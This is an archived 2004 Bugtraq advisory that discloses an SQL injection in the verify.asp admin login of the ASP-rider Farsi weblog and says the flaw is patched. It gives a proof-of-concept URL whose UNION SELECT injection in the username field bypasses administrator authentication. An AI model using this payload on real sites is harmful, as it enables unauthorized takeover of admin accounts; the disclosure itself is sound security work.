Bugtraq mailing list archives
ASP-rider is vulnerable to sql injection attack
From: shervin khaleghjou <oil_karchack () yahoo com>
Date: 15 Dec 2004 03:23:08 -0000
-------------------www.karchack.com-------------------------- -------------------www.karchack.net-------------------------- affected software decribtion : asp-rider is a full farsi weblog written in asp www.asp-rider.com -------------------------------------- Vulnerabilities: the file verify.asp in blogadmin folder is vulnerable to sql injection attack ------------------------------------- proof of concept : you can easily log in to the weblog administrator page by entering : www.site.com/weblog/blogadmin/verify.asp?username='union select 1,1,1,1,1,1,1,1 from tbl_users where ''='&password=1 ------------------------------------- this vulnerability is already patched. www.karchack.com www.karchack.net
Current thread:
- ASP-rider is vulnerable to sql injection attack shervin khaleghjou (Dec 14)